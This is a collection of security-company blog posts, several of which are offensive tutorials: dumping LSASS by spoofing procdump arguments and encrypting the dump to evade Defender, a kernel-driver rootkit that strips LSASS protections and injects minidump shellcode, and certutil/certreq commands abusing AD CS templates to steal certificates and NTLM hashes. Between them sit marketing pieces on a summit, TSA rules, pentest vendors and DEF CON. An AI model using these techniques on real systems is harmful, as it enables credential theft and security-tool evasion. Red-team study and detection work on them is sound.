One of the popular methods for dumping LSASS is using the procdump.exe program from the Sysinternals Suite. Something like:

procdump64.exe -accepteula -ma <lsass pid> -o dumpfile.dmp

However, Microsoft is well aware of this method, and it is being tracked along with several other common methods and tools.

https://www.microsoft.com/en-us/security/blog/2022/10/05/detecting-and-preventing-lsass-credential-dumping-attacks/

Now procdump is legitimate software with many use cases and it is signed by Microsoft. From the Microsoft article that discusses preventing LSASS credential dumping, we can see that it’s alerting on procdump with the -ma command line flag (which writes a full dump file) on the LSASS.exe process. So, what if we start procdump with some ordinary, non-suspicious command line arguments, and then swap them out behind the scenes with our LSASS dumping magic. At the time of writing (December 2023) we can successfully dump LSASS undetected on a fully updated Windows 10 machine. On Windows 11, this technique will work, but the resulting dump file will be detected. However, the good news is we will be able to safely secure the contents of the file before Defender can get its paws on it.

At a high level, we will:

We will be using Rust for this. It is a great language for offensive development due to its speed and difficulty to reverse. It’s also my favorite programming language.

We will be using the official Windows crate for our WinAPI calls, the fantastic Dinvoke_rs for NtAPI calls, and sysinfo to simplify our life in finding the LSASS PID.

Start by creating a new project with:

cargo new proc_noprocdump

We will start off by calling CreateProcessA to start procdump64.exe in a suspended state.

A couple things to note here. First, the non-suspicious arguments we are calling here must be longer than what we are replacing. Our LSASS dumping arguments will be:

-accepteula -ma <lsass pid> -o test.dmp

So as long as the initial arguments are longer than that, we are good. Next, in addition to CREATE_SUSPENDED, we are also passing the CREATE_NEW_CONSOLE flag. This is to allow our program to continue executing while the dump file is being created. This will be important later.

Next, we will use dinvoke_rs to call NtQueryInformationProcess. This library allows us to dynamically call the function, bypassing any API hooks. It also will not create an entry in the Import Address Table.

The function signature for NtQueryInformationProcessis the following:

We will have to create a function pointer with the Rust data type equivalents. HANDLE, and NTSTATUS we can get from the Windows crate. The rest we will use a comparable Rust data type. We can see the out parameter ProcessInformation has a type of PVOID. This will get filled out to be a PROCESS_BASIC_INFORMATION struct. So, we will pass a mutable pointer to that type (courtesy of the Windows crate) in our function signature.

The resulting function pointer will look like the following:

Then we can call the “dynamic_invoke!” macro, giving it the library base address, function name, function pointer, return variable, and our actual NtQueryInformationProcess parameters.

This call will fill the PROCESS_BASIC_INFORMATION struct which contains the base address to the PEB (Process Environment Block). The PEB has a field “ProcessParameters” which is what we’re after.

Before we dive into reading the PEB data, I want to talk a bit about types, type casting, references, and pointers, and how that works in Rust.

In so many WinAPI calls, you pass a pointer to the variable that receives the data. For example, let’s look at the function signature for ReadProcessMemory in MSDN and the Windows crate documentation.

We are going to be calling ReadProcessMemory to read the PebBaseAddress field from the PROCESS_BASIC_INFORMATION struct into a local PEB variable.

In C you could do something like:

PEB peb = NULL;
ReadProcessMemory(…, …, &peb, …, …);

Defining a variable of type PEB and assigning it to NULL. Then passing the pointer to the ReadProcessMemory function to fill out the PEB struct.

However, in Rust, the compiler is very strict on types and there is no “NULL” that we can assign. We also can’t just declare the variable and initialize it later. The compiler will yell at us.

Fortunately, the solution is very simple. Basically, all types will have a default method which can be called to set a default value for the type.

let peb: PEB = PEB::default();

However, if we look back at the lpbuffer variable in ReadProcessMemory, it is expecting a type of *mut c_void. This is very common and most WinAPI calls in Rust will be expecting this type when dealing with buffers and memory addresses.

We can’t just pass a reference &mut peb to the function when it is expecting a pointer of a different type. The compiler will yell at us.

You may be thinking can we just cast &mut peb to *mut c_void? Short answer, no. Long answer, yes.

This is where transmute comes in. This function allows us to perform this cast in a “Rust approved” fashion.

We give it the type that we have, and the type that we want, and pass it the data it will operate on.

use std::mem;
let peb: PEB = PEB::default();
let peb_c_void: *mut c_void = mem::transmute::<&PEB, *mut c_void>(&peb);

There are a couple extra steps we need to transform the data, but that’s one of the headaches joys of Rust 😊.

Getting back on track, now we will make two calls to ReadProcessMemory. The first will be to fill out our peb variable. The second will be to read the ProcessParameters field in the PEB.

Now if we run it, we can see that the memory address where our arguments are. If we attach a debugger to procdump64.exe and go to that address, we can confirm that’s the start of our arguments.

Now we need to create our argument string and write it to memory. If we look at the definition of RTL_USER_PROCESS_PARAMETERS, we see the CommandLine parameter is of type UNICODE_STRING.

The Rust type definition for UNICODE_STRING is as follows:

Since we are dealing with UNICODE and PWSTR, these are all going to be wide char strings. In Rust we will use u16. We will get the PID of LSASS with the sysinfo crate, create our string, encode it to be UTF-16. I mentioned in the beginning that the original arguments need to be longer than the LSASS dump arguments. After we create our new argument string, we will check the length, and if it’s shorter than the original, we will add 0’s to the end so they are the same length. Then we will call WriteProcessMemory to replace the original arguments with our new ones.

Here is our get_pid() function to get the LSASS PID.

Excellent, so now if we inspect the arguments, we can see they have been replaced with our LSASS dumping arguments.

The only caveat with this is that inspecting the process with something like procexp64.exe will show the new arguments.

Let’s fix that.

Looking back at the CommandLine field, we know that the buffer is a UNICODE_STRING. This type has three fields: Length, MaximumLength, and Buffer. We need to find the offset to the Length field, and update that value to be the length of just our call to C:\SysinternalsSuite\procdump64.exe.

We already have a pointer to our ProcessParameters variable where we wrote our arguments. So, we can use that to access the CommandLine field and cast that to a UNICODE_STRING pointer. Then we will get the offset by subtracting our ProcessParameter pointer from our UNICODE_STRING pointer. Lastly, will add this offset to our peb.ProcessParameters variable and this should get us the address of the Length field.

Inspecting the address with a debugger shows 92 in hex, which matches our length of 146 in decimal.

We get the length of our call to C:\Sysinternals\procdump64.exe and multiply it by size of u16 type (since we are dealing with Unicode) and call WriteProcessMemory to update the value.

Looking at the address again, we see the length field is now 70.

If we look at the procdum64.exe now with procexp64 we can see that the LSASS dumping arguments are no longer there.

At this point we can resume the thread and call it a day. We have a capable payload that will dump LSASS on a fully updated Windows 10 machine without Defender batting an eye.

To have this succeed on Windows 11, we have a little more work to do. I should clarify - running this will succeed on Windows 11 and the dump file will get created, however it will get detected by Defender once it’s finished and Defender will delete it.

To overcome this, my thought was that we can read the file as it’s getting written to by procdump and write the contents into a buffer that we can use later on.

This is where kicking off procdump in the new console window is helpful, because now our program can continue. While procdump is doing its thing, we will wait for the file to exist by checking if we get an error or not by trying to open a handle to the dump file. We will run this in a while loop so that it continues to check until the dump file is first created by procdump.

Next, we will use the Tokio Asynchronous Runtime library to open a handle to the file. We will use a tokio Interval to read the file every 500 milliseconds and write the contents to a byte vector. We will do this with the read_to_end method which returns the amount of bytes read and saves the file content in the byte vector. We will keep track of this number and use the seek function to jump to the new portion of the file in each iteration.

While I was testing this, it doesn’t appear that procdump is consistently writing to the file. It writes the data in two big chunks. So, we can’t just wait till the buffer stops growing. Instead, we’ll just give it a minute or so to write all the contents. There is probably a better way to do it, but meh, it’s fine.

Here is our code from resuming the thread to reading the dump file: Notice I set the file path to not write the file to my noscan folder which is immune from Defender. I am also running our proc_noprocdump.exe file on my Desktop as well. So now we are under the microscope with Defender.

Also, a friendly PSA to remind you to turn Automatic sample submission off to keep Microsoft’s grubby paws off your tooling.

When we run it and procdump is creating the dump file, we can see the data being written to the file in two chunks as our count increases.

Funny enough, procdump finishes while our loop is still running, and Defender flags the dump file. However, because we have an open handle to the test.dmp file, Defender is not able to delete it.

Now that we have the LSASS dump file contents safely in memory, we can do with it what we wish. For example, POST it to a web server to extract the contents offline, or encrypt it and write it back to the machine so that you can take it offline and decrypt later.

We will go with the latter.

For our example we will just encrypt the data with RC4 and write it to a file.

When we run it, it will save our encrypted LSASS dump file. Now we don’t have to worry about Defender detecting it! We can just take it offline later to decrypt and feed into mimikatz.

This is a rough PoC that has lots of room for improvement. Some cool optimizations would be encrypting our command line arguments string with a library like litcrypt, downloading procdump from a remote webserver or including it in the binary, and not having to hard code all the file paths.

Ideally, we would not be triggering Defender at all, but at least we are able to achieve the same result, which is getting the LSASS dump file.

Full source code is available here:

https://github.com/djackreuter/proc_noprocdump

Thanks for reading!

The recent 20th Anniversary of IT Summit was an eye-opener for tech enthusiasts, security professionals, and business leaders alike. This annual two-day event brings together IT leaders from across the country to learn about the latest strategies and challenges in the infrastructure, data center, and InfoSec communities.

This year’s discussions revolved around the evolving landscape of business applications and data center access. This evolution is driven by the need to adapt to a rapidly changing digital world, characterized by increasing cyber threats and the demand for enhanced security. A few key themes were hot topics this year including identity-based access, leveraging the zero-trust model, the use of xDR API-enabled security ecosystems, and the integration of automation and AIOps for self-healing security, network, data center and public cloud infrastructure.

Here are our top takeaways from our industry visionaries on each topic:

Identity-Based Access

Traditionally, security systems have focused on network-based or perimeter-based defenses. As remote work and cloud services have become the norm, identity-based access is gaining importance. This approach ensures that only authorized users can access critical systems and data, regardless of their location.

Leveraging the Zero-Trust Model

In a zero-trust environment, trust is never assumed, and verification is a constant process. This model provides a higher level of security by continuously verifying the identity and security posture of every user and device attempting to access resources. By adopting the zero-trust model, organizations can enhance their security and protect against both external and internal threats.

xDR API-Enabled Security Ecosystem

This approach emphasizes data context sharing and enrichment, allowing security solutions to work in synergy. By integrating various security tools through APIs, organizations can enhance threat detection and response capabilities. This holistic approach to security is vital in a world where cyber threats are constantly evolving.

Automation and AIOps

Instead of relying on static security infrastructure responses, organizations are moving towards dynamic, self-healing responses. AIOps (Artificial Intelligence for IT Operations) allows for real- time threat detection and response, reducing the human intervention required for security operations. Automation ensures that security systems can adapt to emerging threats with agility and precision.

Intent and Narrow Focus

To achieve success in network and security infrastructure automation and AIOps initiatives, it's crucial to have a clear intent and a "narrow focus". In other words, organizations need to set specific goals and identify the data points that provide the necessary visibility. This requires upgrading infrastructure to collect and correlate these data points. High-fidelity input and data points are essential for effective security.

Quantifying Cyber Investments

InfoSec programs have evolved over the years, starting from technical controls investments to compliance and risk-based controls investments. The current focus is on data-driven investments based on financial exposure and annual expected losses, ensuring that investments align with risk tolerance and financial objectives.

How SynerComm Can Help

SynerComm's One Strategic Security Plan (OneSSPTM) offers a comprehensive range of services to support organizations on their security maturity journey. We collaborate with IT teams to identify their security needs, develop a unique path forward, and provide both the necessary solutions and expertise.

INSIGHTS Express and Enterprise offers tailored assessments, risk analysis, and financial impact evaluations to help organizations understand their current security posture and plan for improvements with a clear return on investment.

Our team also offers application assessments, penetration testing, adversary simulations, and continuous penetration testing to test and fine-tune security controls. Our technology sourcing expertise optimizes network and security infrastructure design, deployment, and ongoing operations, ensuring cost-effective and efficient solutions.

The 2023 IT Summit shed light on the critical shifts in business application and data center access, driven by identity-based access, xDR API-enabled security ecosystems, and more. As the digital landscape continues to evolve, organizations must adapt and prioritize security to protect assets and stay competitive. Our range of services and expertise can assist you in navigating this evolving landscape and enhancing your cybersecurity defenses. Connect with our team to get started today.

In today's increasingly digital world, the aviation industry is more reliant on technology than ever before. As aviation systems become more connected and dependent on the internet, the risk of cyber threats to airlines and airports has grown significantly. In recognition of this evolving threat landscape, the Transportation Security Administration (TSA) has recently issued a set of new cybersecurity requirements for airports and aircraft. Probably not surprising, the TSA's latest cybersecurity directives emphasize the importance of penetration testing and continuous security monitoring.

TSA's New Cybersecurity Requirements

The TSA's press release, dated March 7, 2023, outlines the key components of their new cybersecurity requirements for the aviation sector. These requirements aim to bolster the cybersecurity posture of airlines and airports to safeguard critical systems and passenger data. Some of the key highlights include:

  1. Threat Assessment: Airlines and airports are now required to conduct comprehensive threat assessments to identify potential vulnerabilities and threat actors. This proactive approach helps in understanding the specific risks that an organization may face.
  2. Network Security: Enhanced network security measures, including the implementation of intrusion detection systems (IDS) and intrusion prevention systems (IPS), are mandated to detect and mitigate threats in real-time.
  3. Security Awareness Training: TSA requires all aviation personnel to undergo cybersecurity awareness training to recognize and respond to potential threats effectively.
  4. Incident Response Plans: Airlines and airports must establish and maintain robust incident response plans that outline procedures for reporting, assessing, and responding to cybersecurity incidents.
  5. Vendor and Supply Chain Security: Improved vendor and supply chain security is encouraged to ensure that third-party components do not introduce vulnerabilities into an organization's systems.
  6. Cybersecurity Audits: Frequent cybersecurity audits are to be conducted to evaluate the effectiveness of security measures and identify areas for improvement.

Importance of Penetration Testing

Penetration testing, also known as pentesting, is a crucial component of the TSA's new cybersecurity requirements. It involves simulated cyberattacks on an organization's systems to evaluate their security posture and identify vulnerabilities. The importance of penetration testing can be summarized as follows:

  1. Identifying Vulnerabilities: Penetration testing helps organizations pinpoint weaknesses in their systems that may otherwise go undetected. By simulating real-world attacks, vulnerabilities can be discovered and addressed before malicious actors exploit them.
  2. Control Testing & Validation: Pentesting mimics the tactics, techniques, and procedures used by cybercriminals, providing organizations with a realistic assessment of their security defenses.
  3. Risk Mitigation: By proactively addressing vulnerabilities, penetration testing reduces the risk of successful cyberattacks, safeguarding sensitive information and critical systems.
  4. Compliance: Many regulatory frameworks, including the TSA's new cybersecurity requirements, mandate regular penetration testing as a part of security best practices.

Continuous Security Monitoring

In the ever-evolving landscape of cybersecurity threats, continuous security monitoring is vital. This practice involves the constant surveillance of an organization's network and systems to

detect and respond to potential threats in real-time. The significance of continuous security monitoring includes:

  1. Rapid Threat Detection: Continual monitoring allows for the immediate detection of suspicious activities or anomalies, minimizing the time cyber threats can go undetected.
  2. Incident Response: With continuous monitoring in place, organizations can respond swiftly to incidents, reducing potential damage and recovery time.
  3. Compliance Adherence: Many regulatory requirements, including the TSA's, mandate continuous security monitoring to ensure organizations remain in compliance with evolving security standards.
  4. Adaptive Security: The ever-changing threat landscape demands a dynamic and adaptive security approach. Continuous monitoring enables organizations to adapt and respond to new threats as they emerge.

tldr;

The TSA's new cybersecurity requirements for airlines and airports underscore the critical importance of staying ahead of the evolving threat landscape. Penetration testing and continuous attack surface management play pivotal roles in ensuring the safety and security of aviation systems and passengers.

In a world where the aviation industry is more interconnected and dependent on technology than ever before, organizations must embrace these practices to proactively identify vulnerabilities, respond to threats, and safeguard their critical systems. Compliance with these requirements is not just about adhering to regulations; it's about preserving the trust and safety of the flying public. Penetration testing and continuous security monitoring are not just checkboxes on a list; they are the keys to a safer, more secure aviation industry in the digital age.

In my last blog post, I discussed one method of dumping LSASS where we created a DLL that we injected into Task Manager. We could then create an LSASS dump from Task Manager, and the DLL would hook the API calls responsible for creating the file and change the filename to something else. This allowed us to create an LSASS dump file and it was sufficient to bypass Windows Defender. If you missed that blog post, you can read it here. That research was done on a fully updated Windows 11 machine back in April of 2023.

However, in the ever-evolving security world, Microsoft has introduced new protections on LSASS that prevent us from being able to create an LSASS dump. Even when running as Authority System, we are getting an Access Denied error.

In this blog post, we will circumvent these new protections to dump LSASS by creating a rootkit that will change the process protections of both LSASS and our process. We will then inject shellcode that performs the minidump of LSASS into another protected process to thwart AV.

I love Rust and it is my go-to language for all things malware development; however, I think some things are a bit easier to do in C/C++. Kernel drivers being one of them. We will write the kernel driver in C++ and the client that interacts with it in Rust.

I highly recommend the book Windows Kernel Programming by Pavel Yosifovich. It was an invaluable resource in learning about driver development.

To not take up too much time going over the prerequisites, make sure you have Rust installed, and see this link for setting up Visual Studio for driver development.

https://learn.microsoft.com/en-us/windows-hardware/drivers/download-the-wdk

For context, I am doing the development on my Windows 11 host machine and testing on a Windows 11 VM.

Now, we are not going to focus so much on the finer points of the driver code. The main focus will be on the implementation, how we can change the process protections, and subsequently inject our minidump shellcode. I will cover the necessary points in the driver code, but for more details I will refer you to the Windows Kernel Programming book.

At a high level, our driver will create a symbolic link that we can use to open a handle to it from our client application in user-mode. We will pass the process ids of LSASS and our client to the driver through a struct. The driver will then operate on those process ids to change the protections of both processes. Once that’s done, our client will be able to open a handle to a protected process and inject shellcode into it that will perform the LSASS dump.

Process Protections

System-Protected Processes are a security feature implemented in the Windows kernel to protect certain processes on the system from attacks. When a process runs as a system protected process, it only allows trusted, signed code to load into the protected service. This ensures that only authorized and trusted applications have access to these System Protected Processes. This is the reason our LSASS dump now fails, and the reason you can’t simply terminate an anti-virus process running on the system.

There are two types of protections Protected Process (PP) and Protected Process Light (PPL). There is also a Signer field which influences the overall protection level. This is determined by the Extended Key Usage (EKU) field in the files digital signature.

The three Process Protection structs we are interested in are PS_PROTECTION, PS_PROTECTED_TYPE and PS_PROTECTED_SIGNER. They are documented here.

The combination of the Protected Type and Protected Signer values are used to create the process protection value. E.g., a protection type of PsProtectedTypeProtected (2) and a protected signer of PsProtectedSignerWinTcb (6) gives us a protection level of 0x62.

The protection level of a process lives in the EPROCESS struct. According to MSDN it is “an opaque struct that serves as the process object for a process.”

We the kernel debugger attached; we can view the EPROCESS struct members in WinDbg with the

dt nt!_EPROCESS command.

The following three fields are what we are interested in.

We cannot access these fields directly like EPROCESS->Protection. Instead we can call PsLookupProcessByProcessId which returns a pointer to the EPROCESS struct of the specified process. After that we will use the offset to access the fields we need. We can look at the field’s values in WinDbg like so:

First, get the process address:

Then you can access fields in the EPROCESS struct.

Current LSASS Protections

As you saw previously, trying to create a dump file of LSASS fails even when running as Authority System. What’s interesting is if we look at the LSASS process with Process Hacker, it shows a protection level of none.

If we use ProcExp64 to inspect the LSASS process, we can see it has a protection level of PsProtectedSignerNone.

This protection level on LSASS is new and was not present on Windows 10.

Now what’s puzzling is, as we can see in WinDbg, it has a protection level of 0x08, but all other flags are set to 0 except for Audit.

Even SignatureLevel and SectionSignatureLevel are 0.

Given what we know about how the protection level is calculated, it doesn’t quite make sense. Unfortunately, there is also not a lot of official documentation on these protections to give us additional details. Additionally, Audit is a reserved field which enhances its ambiguity.

Nevertheless, we will be setting all these fields to 0 which does the trick and will let us dump LSASS. Which is really what we are after.

Now for creating the driver. We will create a new project in Visual Studio of type Empty WDM Driver. We will then create a DriverEntry function like so.

DriverEntry is the entry point for the driver. It is like the equivalent of “main” in a user-mode application. The parameters of this function are a DriverObject and a RegistryPath. Since we are not using RegistryPath, we will use the macro UNREFERENCED_PARAMETER to avoid compilation issues.

Next, we set the DriverUnload function, which un-does everything we do in DriverEntry to cleanup after ourselves and avoid any memory leaks. We also set the MajorFunctions we need. IRP_MJ_CREATE and IRP_MJ_CLOSE are needed so we can open and close a handle to the driver, and IRP_MJ_DEVICE_CONTROL is what we will call from user-mode to change the protections. In the rest of the DriverEntry function, we are creating a DeviceObject and symbolic link which is what we will access in user-mode to open a handle to the driver.

We will also create another file, LvlChg.h, that contains some definitions that are typically shared between the kernel driver and user-mode agent. Since we are writing the client in Rust, we will create these definitions in both C++ and Rust.

Here we are creating the device, which you can name whatever you like, Microsoft’s documentation specifies that values for 3rd party drivers begin with 0x8000 so that’s what we’ll do. Then we create the control code. Because you can define multiple functions, the control code is used to determine what function you are trying to call in user-mode.

Last, we have a struct containing process IDs that we will be passing from user-mode. The process ID of our client that we will use to add protections, and the process ID of our target which is LSASS.

Now let’s jump into some Rust and start creating our client. First, we will create a new Rust project with

cargo new lvlchg_client

You can name it whatever you like. One of the reasons I love Rust is that it has full support for the Win32 API straight from Microsoft. There are other crates that offer Win32 support, but I strongly prefer the one from Microsoft so that’s what we’ll use.

First thing we will do is, before the main function, create the process ids struct, and create a macro for the CTL_CODE macro that does not exist in the windows-rs crate.

Next, we will get the PID of the process we want to inject the minidump shellcode into. This will be the PID of another protected process.

We will also create some constant variables with some of the definitions we will use when creating the device and control code.

After that, we can open a handle to our driver with CreateFileA, note that the file name is the name of the symbolic link we created in the driver.

Next, we will write a little function to get the process ID of LSASS using the sysinfocrate.

See how much easier that is in Rust 😉. We will then populate the Process ID struct with the LSASS PID and the PID of the client. Then we’ll call DeviceIoControl and pass it the handle to the driver, specify the control code, and pass it the Process ID struct. This function invokes the IRP_MJ_DEVICE_CONTROL major function in the kernel driver.

Back in the kernel code, we are doing some input validation checks and casting the input buffer to a Process ID struct. We then look up the Windows version we are on and get the offset (more on this in a moment) before calling the function that changes the process protections.

Now for changing the process protections. We are calling PsLookupProcessByProcessId to get a pointer to an EPROCESS struct. From there, we add the offset for the Windows version we are on to get the process protection information. Once we have that, we are setting the protection level to 0 across the board for LSASS and adding a protection level of PsProtectedWinTcb for our client process.

Now back to the Windows offset…

Different versions of Windows have the struct values we need at different offsets. This means that we cannot just call EPROCESS->SignatureLevel, but rather need to add the offset for the Windows version we are targeting to get the correct value. Fortunately, there are known offsets that we can use be sure to get the correct value.

We can create an enum with the Windows versions we want to support and the offset for that version as the value.

We know the offset to use for each version, and we can lookup the build number with RtlGetVersion. We can then lookup Windows 10 versions and Windows 11 versions to match the build number to the version. Dynamically looking up the Windows version and finding the proper offset ensures that we don’t need to recompile the driver every time we want to target a different Windows version.

Now we see our lvlchg_client.exe process running as PsProtectedWinTcb and the protections on LSASS are now gone.

Now that we have adjusted the process protections accordingly, we could just call MiniDumpWriteDump from our process and be a-okay. But wouldn’t it be cooler if we could inject into another protected process and have that do the minidump for us?

A while back I created pic_minidump which executes a minidump and was written to be position independent. This means it can easily be transformed into shellcode to increase its versatility. By default, it creates the dump file in C:\Windows\test.dmp.

In the client code, since we are accepting the PID we want to inject into on the command line, I embedded the minidump shellcode into the client and am converting the PID into bytes and interpolating it into the shellcode at the necessary locations. This is so the shellcode does not need to be compiled and added to the project each time you want to inject into a different PID.

Now you may be apprehensive about running code off GitHub with mysterious shellcode in it. But it’s fine. Source: Trust me bro.

If you want to add the shellcode yourself, you can compile the pic_minidump project yourself and convert it to shellcode per the instructions in the repo. You will just need to change the process id to the one that you are wanting to inject into.

When choosing a process to inject into, I had the most success with SecurityHealthService.exe. It runs at a lower protection level than our client process, and injecting into it had no adverse effect on the system.

Continuing in the client code, we can open a handle to the process and inject the minidump shellcode into it.

With all that done, all we have to do is compile both projects, load our driver and execute our client with the process id of SecurityHealthService.exe

After all that, we can see the dump file created at C:\Windows\Tasks\test.dmp.

Full code for the driver and client are available below:

Driver: https://github.com/djackreuter/lvlchg

Client: https://github.com/djackreuter/lvlchg_client

References

https://memn0ps.github.io/rusty-windows-kernel-rootkit/

https://itm4n.github.io/lsass-runasppl/

https://www.crowdstrike.com/blog/evolution-protected-processes-part-1-pass-hash-mitigations-windows-81/

Going to DEF CON was a dream I never thought would come to fruition. I remember 2009 being in 8th grade. Reading a physical copy of the magazine Wired. Sitting in the back of parent's minivan on the way to visit family in Milwaukee, WI, and seeing pictures and reading about the largest hacking conference in the world. There were hackers getting arrested, voting machine hacking, lock picking, and hacker jeopardy. That dream came true in 2016 at DEF CON 24.

At DEF CON 31 I returned to speak at the Hardware Hacking Village. My first time speaking at DEF CON was full of anxiety, as the Sunday before flying out I was testing the hardware and I found out I ordered the ESP-01 and not the ESP-01S. I was up until 1 AM trying to get it to work anyway, but ended up putting in a last minute Amazon order (at twice the price of AliExpress) to get the ESP-01S's I needed. Thankfully the Amazon delivery arrived that Tuesday and we flew out Wednesday evening.

My talk (Introduction To Esp8266/Esp32 Microcontrollers And Building A Wi-Fi Deauthentication Detector):

TL;DR of my talk:

Slides are available here: https://twitter.com/TheL0singEdge/status/1690142545605791752

Lesson's Learned:

DEF CON 31 Tool Highlights:

References:
https://media.defcon.org
https://www.flickr.com/photos/r6_cannibal/albums/72177720310525638/
https://twitter.com/search?q=%23defcon

Having sold and performed assessments and pentests for nearly 20 years, I’ve had plenty of opportunities to hone my strategy and messaging. One common challenge I hear is, “our Board of Directors requires us to rotate vendors” or “our examiner wants us to get a new set of eyes”. This article will explain why I think that could be a big mistake.

Let’s first assume that you’ve done your due diligence and selected a qualified pentest firm with experienced consultants and actionable advice. It’s likely that you’ve tried multiple firms before knowing that you’re working with the firm that best fits your company’s needs. So why change pentest providers once you’ve found the one that’s right for you? Below are my practical responses to these well intended practices.

We Need to Rotate Pentest Firms

While there could be worthy arguments for rotating pentesters, rotating pentest firms is risky. If you’ve found a great provider, continue to build that partnership rather than taking risks by starting over with a new firm each year. A good pentest firm can ensure depth and consistency, and they may even help get you out of a jam. By depth, I mean that pentesters thrive and do their best when they collaborate with a team. There’s too much to research, too many blogs, and too many tweets to keep up with everything. When you have a pentester who’s part of a team, you get the combined value of that team. A good pentest firm will also hire and retain sufficient experienced pentesters so you don’t need to worry about the individual pentester on your next engagement.

Consistency is important because a good firm can offer you new pentesters over time while using the same metrics for assessing and reporting risks. The pentesting firm owns the reporting and finding templates, and ensures that all members of the pentest team meet a standard of excellence. Using the same firm for multiple engagements also allows prior notes and findings to be handed off to the next consultant, making subsequent tests more efficient. At SynerComm, we’ve also come to the rescue and helped numerous clients get out of a jam or fill a last second request because of the partnerships we’ve built. It helps to know who you’re going to call when you need help.

We Need a New Set of Eyes

This (perhaps poor) advice hinges on the assumption that your current pentester is missing something or will fail to report a vulnerability in the future. If you think that’s the case, then it’s probably time to find a better pentesting partner. The reality is that good pentesters are always researching the latest vulnerabilities and integrating them into their testing methodologies. When a pentester is part of a team that collaborates and shares with each other, the thoroughness and capability of the team grows much faster. If you need a new set of eyes, you really only need a pentest firm with enough qualified and experienced pentesters to offer new resources over time.

That said, I can make strong arguments for using the same pentester several years in a row. Much like an attorney, doctor, or accountant, your pentester should quickly earn a position of high trust. It’s their job to become intimately familiar with your information security strengths and weaknesses. Having the same consultant on a series of engagements is more efficient because they can build on their prior understanding and pick up where they left off. This can provide more depth and more breadth in subsequent projects. It’s common for SynerComm’s clients to request that the same pentester be assigned to multiple engagements, especially with our adversary simulation services (see note at bottom).

Our Policy Requires Us to Change Vendors

Standards and policies are important right up until they start providing bad guidance. For over 20 years, password aging (expiring passwords after a certain amount of time) was considered an important security control. Despite knowing better, even NIST continued to publish security standards stating that passwords should be set to expire after 90 days. For years companies and government agencies required users to frequently change their password and the result was weaker passwords that are easier to guess. My point is that if you’re only switching vendors because you have a policy that says to do so, then this is a good time to reassess that policy. For all the reasons I just described, most companies will make the greatest security improvements by partnering with a great firm staffed with great people.

Tldr;

The next time you find yourself in a position where your policy, board of directors, or examiner tells you to rotate vendors, start a conversation about effective risk management. Finding a great pentesting partner can be a challenge and there is much greater risk in changing firms than sticking with a partner you can trust. A good firm should have sufficient staff and work history to ensure that you can still get a new set of eyes without losing consistency or efficiency. Imagine how much more you can accomplish each year when you’re not interviewing several new vendors, negotiating new contracts, going through legal reviews, and onboarding new vendors. Just like your attorney or accountant, partner with a firm that you can trust to deliver consistent, high-quality engagements over time.

A Note on Adversary Simulations (AdSim): SynerComm uses the term adversary simulation to describe a unique pentesting service we provide to clients. Rather than only presenting and providing a written report, SynerComm’s pentesters offer live demonstrations of common attacks on our client’s networks. Our adsim sessions are 100% collaborative between our client’s defenders and our pentesters. Both sides get to share their screens and ask questions. Our pentesters show how attack tools work and our clients show evidence of their controls generating logs and alerts. When controls are not effective at detecting or preventing attacks, the adsim can be used to retest until they can be tuned or corrected. The adsim also provides invaluable training for defensive teams to see what their controls look like when detecting real attacks.

Our first adsim is always a “pentest replay”, meaning that it’s content is based on lessons learned from a recent external to internal penetration test. The focus is on methods of command and control, privilege escalation, and lateral movement, but always specific to the last pentest. The adsim highlights both attacks that were prevented as well as those that weren’t. Following an initial pentest replay adsim, many clients schedule several additional adsim sessions to further evaluate their controls against specific threats and APTs.

For more information, check out https://www.synercomm.com/cybersecurity/adversary-simulation/

I’m a fan of full featured and weaponized C2s as much as anyone else to save time if it makes my job easier. Sometimes they can make your job harder when you’re dealing with EDR. A lot of opsec considerations come into play. Just because your C2 supports a particular feature doesn’t necessarily mean you should use it if the goal is to keep your shell or to remain stealthy. A simple command shell and a SOCKS proxy is under-rated if you ask me. Just a reliable / opsec-safe method to execute commands and the ability to proxy through tools on an endpoint solves most of those EDR problems. In that sense I’m always interested in leveraging built-in Windows utilities whenever possible to do my “dirty work”. Prior to SpectreOps’ research, my primary use cases for certutil was launching payloads and base64 encoding/decoding from time to time. But as you might already suspect, these utilities can also come in handy for abusing default templates as a means of credential theft and even elevating privileges. 

This blog assumes that you only have access to a command shell. Right now you just want to go as far as you can with that command shell before you setup your proxy, detonate a C2 agent, etc. It is also assumed that you are already familiar with AD CS vulnerabilities and abuse cases such as those pointed out by SpecterOps (e.g., ESC 1). If you’ve ever played with certutil then you know that it loves to pop up a GUI if/when you don’t supply the right argument so that you can select it. The example commands in this blog avoids those interactions since we are assumed to be working with just a command shell. 

Let’s jump in with some basic certutil 101 to get a list of templates: 

C:\> certutil -v -dstemplate 

This will get you a list of all templates with general permission and enrollment settings. You will not get highly detailed configurations such as those returned through LDAP searches. However, you may still be able to identify vulnerable templates (such as ESC4 shown below). 

We will not be exploiting ESC 4 in this blog. I just wanted to show an example of a vulnerable template that you might encounter using certutil alone by itself. 

The first example we’ll demonstrate for abusing AD CS doesn’t have anything to do with escalation whatsoever. Instead, we will discuss how default templates can be abused the second you obtain your command shell. 

Default User Template 

Straight out of the gate the default “User” template can be used to obtain a certificate for your user. The default validity period for the certificate is 1 year which is useful if the user changes their password either due to expiration or IR steps in down the road and has them change it. As long as the certificate is still valid and hasn’t been revoked then we can use it to obtain the NTLM hash for the account. This allows a semi-persistent form of credential theft (true for all certificates in general). The “ClientAuth” template is another potential option here, but we’ll use the “User” template. Ok, so first let’s go ahead and enroll our user: 

C:\> certreq -q -enroll User 

We’ll note the Serial Number so that we can export the certificate.

Next, we’ll export the certificate using whatever password you want (hang onto it of course) and supplying the serial number for the certificate: 

C:\> certutil -exportpfx -user -p "Password123" My <SerialNum> C:\Users\dwebb\dwebb.pfx 

You can think of “My” as a keyword for the user’s Personal Certificate Store (i.e., using cert manager from the desktop) 

That’s all there is to it. Just two commands. Exfiltrate the certificate however you want and hold onto it. 

certipy-ad cert -pfx dwebb.pfx -password Password123 -export -out dwebbfinal.pfx 

Sometime over the next few hours, or weeks, or year once you have your SOCKS proxy then go ahead and proxychain it through per usual to obtain the user’s NTLM hash. 

NTLM hash is My0ldpass! in case you are curious.

What I love about certificates from an offsec perspective, (but should scare the crap out of defenders) is that this certificate is valid for a year. Defenders will need to hunt it down and revoke it, otherwise, we can still use it whenever we want. 

Password reset to Myn3wpass! but certificate is still valid / has not been revoked 

OK, so we were able to retrieve the user’s NTLM hash with just 2 commands (and eventually a SOCKS proxy at some point within the next year). That’s convenient. 

Certificate Manager can be used to export your certificate if you suspect an alert might be generated. 

